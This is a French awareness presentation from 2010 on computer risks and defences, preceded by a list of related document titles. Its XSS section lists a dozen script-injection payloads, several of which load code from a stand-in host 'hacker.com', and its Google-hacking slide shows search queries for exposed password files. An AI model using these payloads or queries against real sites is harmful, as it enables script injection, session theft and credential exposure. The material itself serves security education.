Techniques d intrusions



Documents pareils
Menaces du Cyber Espace

Charte d installation des réseaux sans-fils à l INSA de Lyon

Présenté par : Mlle A.DIB

TEST D INTRUSION : UNE SIMULATION DE HACKING POUR IDENTIFIER LES FAIBLESSES DE VOTRE SYSTÈME

La sécurité des systèmes d information

Virtual Private Network WAFA GHARBI (RT4) CYRINE MAATOUG (RT4) BOCHRA DARGHOUTH (RT4) SALAH KHEMIRI (RT4) MARWA CHAIEB (RT3) WIEM BADREDDINE (RT3)

Tout sur la cybersécurité, la cyberdéfense,

Gestion du risque numérique

La sécurité informatique

Les Protocoles de sécurité dans les réseaux WiFi. Ihsane MOUTAIB & Lamia ELOFIR FM05

SECURIDAY 2013 Cyber War

Chaque année, près de 400 millions de personnes 1 sont victimes de la cybercriminalité.


Les menaces sur internet, comment les reconnait-on? Sommaire

Sécurité de l information

Protection pour site web Sucuri d HostPapa

Sécuriser les achats en ligne par Carte d achat

RECOMMANDATIONS ET MISES EN GARDE DE McAFEE EN MATIÈRE d achats en ligne

Les menaces informatiques

BANQUE NEUFLIZE OBC LES BONNES PRATIQUES INTERNET ET MESSAGERIE

GESTION DES INCIDENTS DE SÉCURITÉ DE L INFORMATION

Sécurité des réseaux wi fi

Cartographie des risques des réseaux sociaux v6. Clément Gagnon Tactika inc

Si vous avez des questions ou bien si vous voulez tout simplement vous détendre, faite un tour sur le forum.

Projet Sécurité des SI

PHISHING/PHARMING. Les Nouvelles Techniques qui portent atteinte à l intégrité des S.I

Sécurité et protection contre les vulnérabilités dans Google Apps : une étude détaillée. Livre blanc Google - Février 2007

Appliance FAST360 Technical Overview. Sécurité de la VoIP. Copyright 2008 ARKOON Network Security

«Obad.a» : le malware Android le plus perfectionné à ce jour

La gestion du risque et les réseaux sociaux v10

S Catalogue des Formations Sécurité. Présentation. Menu. Présentation P.2 Nos formations P.3 Modalités P.9 Bulletin d inscription P.

ANSSI PROCEDURES DE REPORTING DES INCIDENTS AVEC LE CIRT RÔLES DES PARTIES PRENANTES 15/02/2014. SEMINAIRE DE Joly Hôtel

Internets. Informatique de l Internet: le(s) Internet(s) Composantes de l internet R3LR RENATER

VoIP Sniffing IHSEN BEN SALAH (GL 3) MAHMOUD MAHDI (GL 3) MARIEM JBELI (RT 2) SAFA GALLAH (RT 3) SALAH KHEMIRI (RT 3) YOUSSEF BEN DHIAF (GL 3)

Michel TCHONANG LINZE Coordonnateur Région Afrique Centrale ACSIS - CAPDA capdasiege@gmail.com

L assurance et le risque Data. Clusir 25 avril 2012 Lyon François Brisson - Hiscox France

Sécurité des réseaux Les attaques

Tendances et défenses

Club des Responsables d Infrastructures et de la Production

La sécurité des réseaux sans fil à domicile

Rôle des FAI et des Datacenters dans les dispositifs de cyber-sécurité Ou comment tenter de rendre l Internet plus sûr.

Security Exposed. #1 - Take the red pill. An introduction to hacking & security flaws. ... and follow the white rabbit

Internet sans risque surfez tranquillement

Présenté par : Ould Mohamed Lamine Ousmane Diouf

Notions de sécurités en informatique

Sécurité des Postes Clients

SÉCURITÉ RÉSEAUX/INTERNET, SYNTHÈSE

Les Ateliers Info Tonic. La Sécurité sur Internet Mardi 11 Juin 2013

College Du Chinchon. Torniké Sidamonidzé 3C. M. Brulé

La protection des systèmes Mac et Linux : un besoin réel?

Réseaux : Wi-Fi Sommaire. 1. Introduction. 2. Modes de fonctionnement. 3. Le médium. 4. La loi. 5. Sécurité

Le WiFi sécurisé. 16 Octobre 2008 PRATIC RIOM

MONNIER Marie /2009 WPA

Sécurité. Tendance technologique

OWASP Open Web Application Security Project. Jean-Marc Robert Génie logiciel et des TI

FACULTE DES SCIENCES ET TECHNIQUES FES SAIS MASTER SYSTEMES INTELLIGENTS ET RESEAUX MST SIR 2014 TP WIFI. Encadré par PR.

FORMATION PROFESSIONNELLE AU HACKING

Conseils de sécurité lors de l utilisation d Internet, des cartes bancaires et de l e-banking.

SECURITE DES DONNES. Comment éviter d irrémédiables dégâts. Dr. Jacques Abbeels

Le réseau sans fil "Wi - Fi" (Wireless Fidelity)

Janvier BIG DATA : Affaires privées, données publiques

Bonnes pratiques en SSI. Présentation OzSSI - CDG 54 1

CATALOGUE DES FORMATIONS SECURITE INFORMATIQUE

L'écoute des conversations VoIP

Loi C-28: Première loi «anti-spam» au Canada

Domain Name System Extensions Sécurité

KASPERSKY DDOS PROTECTION. Découvrez comment Kaspersky Lab défend les entreprises contre les attaques DDoS

(Third-Man Attack) PASCAL BONHEUR PASCAL 4/07/2001. Introduction. 1 Domain Name Server. 2 Commandes DNS. 3 Hacking des serveurs DNS

DOSSIER : LES ARNAQUES SUR INTERNET

Gestion des incidents Les incidents de sécurité

WiFI Sécurité et nouvelles normes

Périphériques de stockage amovibles : une menace réelle pour la sécurité des informations en entreprises

Symantec Protection Suite Small Business Edition Une solution simple, efficace et compétitive pour les petites entreprises

Protection exhaustive de réseau corporate, optimisation de trafic Internet, administration flexible

Guide Utilisateur simplifié Proofpoint

Préambule. Les dangers du net sont un sujet tellement vaste et complexe qu un ebook de 500 pages ne suffirait pas à en faire le tour!

Fiche Technique. Cisco Security Agent

Sécurité informatique: introduction

Sécurité sous Linux. Les hackers résolvent les problèmes et bâtissent...

La sécurité informatique d'un centre d imagerie médicale Les conseils de la CNIL. Dr Hervé LECLET. Santopta

How To? Sécurité des réseaux sans fils

DNS : types d attaques et. techniques de. sécurisation. Le DNS (Domain Name System), un élément essentiel de l infrastructure Internet

WIFI (WIreless FIdelity)

Présentation du 30/10/2012. Giving security a new meaning

La Sécurité des Données en Environnement DataCenter

Sécurité des systèmes informatiques Introduction

Le piratage informatique. Rapport de projet. Spécialité Informatique 1 re année. DEJOUR Kévin SOUVILLE Jean-François. Suivi : Mokhtari-Brun Myriam

QUESTIONS / REPONSES ESET Smart Security ESET NOD32 Antivirus V.3

l informatique est vitale pour mon activité je protège mon matériel et mon entreprise

Fraude de masse Sophie Olieslagers 14 mars 2014

The Mozilla Art Of War. David Teller. 20 septembre Laboratoire d Informatique Fondamentale d Orléans. La sécurité des extensions.

CONFIGURER LA CONNEXION RESEAU A L'AIDE DU WIFI INTEGRE DE WINDOWS XP/VISTA/SEVEN, ANDROID ET IOS.

RAPPORT VERISIGN SUR LES TENDANCES EN MATIÈRE D'ATTAQUES PAR DÉNI DE SERVICE DISTRIBUÉ (DDOS) 4E ÉDITION 4E TRIMESTRE 2014

SAGEM Wi-Fi 11g USB ADAPTER Guide de mise en route rapide

Extrait de Plan de Continuation d'activité Octopuce

Catalogue de formation LEXSI 2013

les prévisions securité 2015

État Réalisé En cours Planifié

Par Marc Gaudreau, CISSP

Transcription:

RISQUES INFORMATIQUES ET MÉTHODES DE PROTECTION Charles Demers-Tremblay, CISSP, CEH, CDFT, S+ Les Technologies Wolf inc. 26-04-2010

Introduction Charles Demers Tremblay Je ne suis pas recherché par la police Hacker éthique, contre menaces Spécialités : Tests d intrusions, enquêtes électroniques

Hacking 101

Hacking 101 Motivations? Mandats, défis, «hack»tivisme, recherches, terrorisme (mafia) $$$ 3 types de hacker : White hat, gray hat, black hat Vous voulez en voir?

Pourriels (spam) et Hameçonnage (phishing) Comment se protéger : filtre anti pourriels, et anti phishing (http://www.dslreports.com/phishtrack), vigilance (ne jamais répondre)

Failles de sécurité Les failles d une composante ou d un groupe de composantes peuvent être exploitées de façon malveillante. Slammer? Exemple: (17 septembre 2007) Le courtier en ligne TD Ameritrade a reconnu vendredi qu une de ses bases de données a été piratée, et que des coordonnées concernant ses 6,3 millions de clients ont été volées. Exemple : ( 6 avril 2010) Des pirates informatiques basés en Chine ont volé des informations relatives àla sécurité nationale en Inde, ainsi que 1.500 mails provenant des bureaux du dalaï lama, et d'autres documents sensibles, ont annoncé mardi des chercheurs du "Citizen Lab" de l'université de Toronto. Comment se protéger : Mettre àjour vos équipements (WSUS), activer et vérifier les journaux de sécurité, analyse de vulnérabilités

Le WIFI (sans fil) Il y a quelques années, «craquer» des clés WEP demandait une importante puissance de calcul. Il faut balayer le réseau àla recherche de millions de paquets, ce qui prend des jours, puis traiter les données interceptées, ce qui prend aussi un temps important. Aussi, les pirates ont développés des techniques qui accélèrent le processus de manière fulgurante ; La nouvelle attaque nommée «AirePlay» casse désormais une clé WEP de 128 bits en moins de 5 minutes en utilisant des techniques publiées il y a quelques mois. Exemple: (31 mai 2007) Scandale TJX : c'était une fuite de Wi Fi. L'affaire TJX, le piratage réseau d'une chaîne de magasins qui aurait compromis près de 46 millions d'identités bancaires, aurait commencé par l attaque d un réseau sans fil qui était peu protégé. Comment se protéger : Utiliser une clé WPA2, bloquer la propagation du SSID

avancées La présence sur le WEB Le «Cross site scripting» (ou XSS) est un type de faille de sécurité des sites Web que l'on trouve typiquement dans les applications Web. Ils peuvent être utilisées par un attaquant pour faire afficher des pages web contenant du code douteux. <BODY onload!#$%&()*~+ _.,:;?@[/ \]^`=alert("xss")> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <BODY ONLOAD=alert('XSS')> <LAYER SRC="http://hacker.com/scriptlet.html"></LAYER> <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> <STYLE>@import'http://hacker.com/xss.css';</STYLE> <META HTTP EQUIV="Link" Content=«<http://hacker.com/xss.css>; REL=stylesheet"> <XSS STYLE="behavior: url(xss.htc);"> <OBJECT classid=clsid:ae24fdae 03c6 11d1 8b76 0080c744f389 ><param name=urlvalue=javascript:alert('xss')></object <SCRPT SRC=http://hacker.com/xss.js></SCRIPT> <IMG SRC="javascript:alert('XSS');"> Exemple: (janvier 2005) Une faille XSS exploitée sur le site myspace.com par un utilisateur

avancées Man in the middle L'attaque de l'homme du milieu (HDM) ou man in the middle attack (MITM) en cryptographie est une attaque qui a pour but d'intercepter les communications entre deux parties, sans que ni l'une ni l'autre ne puisse se douter que le canal de communication entre elles a été compromis. L'attaquant doit d'abord être capable d'observer et d'intercepter les messages d'une victime à l'autre. Exemple : Sauvetage de Ingrid Betancourt

avancées DOS et DDOS Une attaque par déni de service (denial of service attack, d'où l'abréviation DoS) est une attaque ayant pour but de rendre indisponible un service, d'empêcher les utilisateurs légitimes d'un service de l'utiliser. Il peut s'agir de : l inondation d un réseau afin d'empêcher son fonctionnement la perturbation des connexions entre deux machines, empêchant l'accès à un service particulier l'obstruction d'accès àun service àune personne en particulier L'attaque par déni de service peut ainsi bloquer un serveur de fichiers, rendre impossible l'accès àun serveur web, empêcher la distribution de courriel dans une entreprise ou rendre indisponible un site internet. Exemple: (août 2009) Le site de microblogging Twitter a été victime d une vaste attaque par déni de service distribuée (DDOS=Distributed Denial of Service Attack).

Google hacking! «Googler»vos propres sites web! Exemple de recherche sur google : confidential filetype:pdf inurl:/cgi bin/pass.txt

Social engineering (vous!) L art de profiter de la bonne volonté des autres! Faites vous confiance àvotre afficheur (callerid)?

Intrusions physiques Est ce un livreur? Non un hacker! Restez vigilant, informez vos utilisateurs que ces menaces existent.

Conclusion Le cybercrime n'est pas prêt de cesser. C'est une réalité du 21ème siècle, et la très large disponibilité d'internet ainsi que les systèmes non sécurisés qui les accompagnent, ont accru considérablement le cybercrime. Une législation suffisamment sophistiquée et des traités internationaux contre le cybercrime sur le point d'être adoptés, devraient aider le monde informatique àjouir d'un cyber espace plus sûr, et respectueux des lois.

Références www.krollontrack.com Nouvelles judiciaires www.securityfocus.com Vulnérabilités www.secunia.com Vulnérabilités johnny.ihackstuff.com Google hacking www.milw0rm.com Exploits